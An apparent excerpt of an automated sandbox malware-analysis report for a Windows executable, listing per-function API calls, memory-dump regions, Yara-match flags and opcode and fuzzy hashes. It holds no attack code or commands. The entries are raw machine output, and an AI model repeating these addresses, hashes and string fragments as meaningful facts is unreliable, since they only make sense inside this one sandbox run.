                                                                  Control-flow Graph: function 4297aa (graph nodes 277-295; API calls shown in graph: EnterCriticalSection, GlobalAlloc, GlobalHandle, GlobalUnlock, GlobalReAlloc, GlobalLock, LeaveCriticalSection; executed/not-executed node colouring and edge list not reproduced)
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,76230A60,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 004297BB
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 0042980C
                                                                  • GlobalHandle.KERNEL32(00662F78), ref: 00429815
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042981F
                                                                  • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 00429833
                                                                  • GlobalHandle.KERNEL32(00662F78), ref: 00429845
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042984C
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429855
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429861
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004298A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                  • String ID:
                                                                  • API String ID: 2667261700-0
                                                                  • Opcode ID: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction ID: c16d36367e021ba24902c865a556433996ae8c1a0eb80cc3bd54c7b43d994e5f
                                                                  • Opcode Fuzzy Hash: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction Fuzzy Hash: 43319A30700714AFDB20DF66D888A6ABBF9FB84344B44497EE546D3620D734ED06CB68

                                                                  Control-flow Graph: function 2267ec0 (graph nodes 297-361; API calls shown in graph: CreateFileW, SetFileInformationByHandle; executed/not-executed node colouring and edge list not reproduced)
                                                                  APIs
                                                                  • SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02268149
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 022681ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CreateHandleInformation
                                                                  • String ID: J$e?M:$e?M:$.#v$Ei${
                                                                  • API String ID: 3667790775-1658071454
                                                                  • Opcode ID: 74aeeec8adc3b2dc327feabe0ad49e3c2ce6a6fd602748faf8848a543ad8ebec
                                                                  • Instruction ID: d53893d64f301f81dbc8427f9fdaad2d4ab3494493649292dd798a4fb55a8586
                                                                  • Opcode Fuzzy Hash: 74aeeec8adc3b2dc327feabe0ad49e3c2ce6a6fd602748faf8848a543ad8ebec
                                                                  • Instruction Fuzzy Hash: FB819172A183019FC318DFE5A49863BB6E6ABC4748F004D2DF556D7258EB70D9488B93

                                                                  Control-flow Graph: function 42a134 (graph nodes 449-484; API calls shown in graph: GetModuleFileNameA, PathFindExtensionA, lstrcpyA, lstrcatA; executed/not-executed node colouring and edge list not reproduced)
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                  • PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                  • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                  • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                  • String ID: .CHM$.HLP$.INI
                                                                  • API String ID: 2140653559-4017452060
                                                                  • Opcode ID: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction ID: bd75d3f52a36107bd73cc6bad142ef63f8b4208a48895ac81a5cbf6014c068f0
                                                                  • Opcode Fuzzy Hash: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction Fuzzy Hash: 19418C71600758DFCB30EFAAEC44ADA77E8EB08314F50482BE986D6241DB389955CF29

                                                                  Control-flow Graph: function 42a282 (graph nodes 490-505; API calls shown in graph: SetErrorMode (twice), GetProcAddress; executed/not-executed node colouring and edge list not reproduced)
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,00425BE7,?,?,?,?,76230A60,00000000,?,0040E996,00000000), ref: 0042A28B
                                                                  • SetErrorMode.KERNELBASE(00000000,?,0040E996,00000000), ref: 0042A293
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,0040E996,00000000), ref: 0042A2DE
                                                                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042A2EE
                                                                    • Part of subcall function 0042A134: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                    • Part of subcall function 0042A134: PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                    • Part of subcall function 0042A134: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                    • Part of subcall function 0042A134: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                  • String ID: NotifyWinEvent$`#vp,$v$user32.dll
                                                                  • API String ID: 4004864024-19817718
                                                                  • Opcode ID: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction ID: 1aae1a9dc3cd045b93222ce5a26779434126d71d87e6cd8d5dbcd172a642732a
                                                                  • Opcode Fuzzy Hash: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction Fuzzy Hash: 9701A2717002219FD724EF21A809A593BA8AF04300F4984AFF445D73A2DB38C880CF7A

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004254CF
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004254D6
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004254DD
                                                                  • GetSystemMetrics.USER32(00000003), ref: 004254E7
                                                                  • GetDC.USER32(00000000), ref: 004254F1
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00425502
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042550A
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425512
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                  • String ID:
                                                                  • API String ID: 1031845853-0
                                                                  • Opcode ID: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction ID: 6a1c861a32fe4ac7800512cecdb92344e909a3b8a9975da52ba67c4561c5568e
                                                                  • Opcode Fuzzy Hash: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction Fuzzy Hash: A6F01D71A40704AEE720AF729C89F277BA4EB81B51F11493AF6418B2D0D6B598068F54

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02263182
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &$B$S=
                                                                  • API String ID: 1279760036-3580750612
                                                                  • Opcode ID: c176824edb98fbd5e41360c12f106041cc9bf0535de45a03b62b05812e7c86b1
                                                                  • Instruction ID: 8231352bf0b12ad33a82a38a067525dafc8c8b0f772f9d61ba66f344beea1211
                                                                  • Opcode Fuzzy Hash: c176824edb98fbd5e41360c12f106041cc9bf0535de45a03b62b05812e7c86b1
                                                                  • Instruction Fuzzy Hash: 7C51D473B183029BC718DEE4949C53AB7E6FBD4A44F14489EE045CB258DBB0D9898BD2

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02264C21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID: D$.#v$Ei
                                                                  • API String ID: 963392458-2687700827
                                                                  • Opcode ID: d3c61979f1b613f964d13664390a4fdd1be7395942c843eaed0d696bd761c979
                                                                  • Instruction ID: bba6bad19ddb47d038aacaf14ef77005df471ce0ac79f0d5c0276b4fdd660a36
                                                                  • Opcode Fuzzy Hash: d3c61979f1b613f964d13664390a4fdd1be7395942c843eaed0d696bd761c979
                                                                  • Instruction Fuzzy Hash: B321B637B113026BD714EBF4AC58B7A37A3AFC0640F104819F585C7284EFB0D8458791

                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(80000001,0043B2A4,00000000,00000001,?), ref: 00428215
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00428235
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428279
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0042828F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Close$OpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 1607946009-0
                                                                  • Opcode ID: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction ID: fa71898e03329bcf94aa1d3a20f1a241a73731d4e52d53b435c0548dfa0eec47
                                                                  • Opcode Fuzzy Hash: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction Fuzzy Hash: 9E216AB1E01228EFDF15CF96D848AAEBBF8FF94314F5040AEE405A6211DB745A01CF29

                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,021C0005), ref: 021C00E9
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,021C0005), ref: 021C0111
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 2032221330-0
                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction ID: 10b205524862d1537b6e42184a6caad32ee4480a3d896e070fb0f1779713c314
                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction Fuzzy Hash: E7D1D179A88306CFD714CF69C88076AB3E1FFA8318F29452DE8958B341E774E855CB91

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID: Ei
                                                                  • API String ID: 4033686569-3988083245
                                                                  • Opcode ID: 4477d947eb3242f3d060ac2965775bc7e64820b2fa5a836bb1eebe5f731d0b45
                                                                  • Instruction ID: 1983b8e0d0d96037170a2385f9700fa33540784ddc0bee1066fe46c5828397c6
                                                                  • Opcode Fuzzy Hash: 4477d947eb3242f3d060ac2965775bc7e64820b2fa5a836bb1eebe5f731d0b45
                                                                  • Instruction Fuzzy Hash: FB118277F513016BD714F7F5A8ACA7B3197ABC4A44B0448ACE416CB248EE74C8518BE1
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0040DDDF
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00431A20,0000000C,0040DE48,000000E0,0040DE73,?,0041086B,00000018,00431B30,00000008,00410901,?,?), ref: 0040DE20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCriticalEnterHeapSection__lock
                                                                  • String ID:
                                                                  • API String ID: 409319249-0
                                                                  • Opcode ID: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction ID: cb3ef9c9b0d75a7fffe9d60d5eea93ecefce8f5efa7861fcc474e081dc08dee6
                                                                  • Opcode Fuzzy Hash: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction Fuzzy Hash: 30F0C231D41A14A7DB20BFA1EC0675E7B30AB25728F20023BE9143A2E1C73C299986CC
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040E8E0,00000001,?,00431A70,00000060), ref: 00410944
                                                                    • Part of subcall function 00410984: HeapAlloc.KERNEL32(00000000,00000140,0041096C,000003F8,?,00431A70,00000060), ref: 00410991
                                                                  • HeapDestroy.KERNEL32(?,00431A70,00000060), ref: 00410977
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction ID: 644ccde18484a5878455bc069f2a0ce95f43452f64f7cc8ffed50bff23627854
                                                                  • Opcode Fuzzy Hash: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction Fuzzy Hash: E7E09AF1BB03089AFB206B716C1876676A4EB44346F10483BF240C82A2EFB8D5C19A0C
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041F848
                                                                  • SetWindowsHookExA.USER32(000000FF,0041F6B7,00000000,00000000), ref: 0041F858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CurrentHookThreadWindows
                                                                  • String ID:
                                                                  • API String ID: 1904029216-0
                                                                  • Opcode ID: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction ID: 92535d9c526e6fa1784d7b0884afd0ec4ee71ce80cfdde11631e7970a4356ca2
                                                                  • Opcode Fuzzy Hash: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction Fuzzy Hash: 32D05E72B042606EDB217B72BC09B553A845B00320F9806AAF411911D2C7288C834B6E
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000), ref: 02265CCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: d3fab1d135a5a4648cf58a609ccfeed82b988a241aecbaa36631449b31c14e0e
                                                                  • Instruction ID: b03b40f21b5c3f8296bc5cf91cd02c77bfd1f1ba3d9d7d54db3281bd4f28f296
                                                                  • Opcode Fuzzy Hash: d3fab1d135a5a4648cf58a609ccfeed82b988a241aecbaa36631449b31c14e0e
                                                                  • Instruction Fuzzy Hash: 3DD0C927B62301A6E600AAF078ADB3A35575FA0A44F009819E5159A28CEE6088624AD1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction ID: 86b6000765a73317fef6ebdd1d3f7835681af8542c8e3a940374cd9bb61a5516
                                                                  • Opcode Fuzzy Hash: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction Fuzzy Hash: 145173319402049FCB14DBA9CCC09EEB7F9EF49324F24452BE512E76D0D778A985CBA9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 296c11db14dd46904e722935a9da397ec8c57e6725c6a21711c9545b8e4c59d2
                                                                  • Instruction ID: e4c131b897a3fcead199d08bcb87b66aa7ad4c3052855cee646d444ddd4de67e
                                                                  • Opcode Fuzzy Hash: 296c11db14dd46904e722935a9da397ec8c57e6725c6a21711c9545b8e4c59d2
                                                                  • Instruction Fuzzy Hash: 2A410975A40109EFDB48CF44C494BAAB7B2FF88314F24C199E9295F355D772EA82CB80
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022668DC), ref: 022670F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: c3057499af352d91fb1a3178de4aae296ca75a1cefb17f38448a5921e24e51ae
                                                                  • Instruction ID: ea4ceabd6f315ec7c1d00b63b9c8f07c686c5cd70eb32c3706c9ef83251cc1b0
                                                                  • Opcode Fuzzy Hash: c3057499af352d91fb1a3178de4aae296ca75a1cefb17f38448a5921e24e51ae
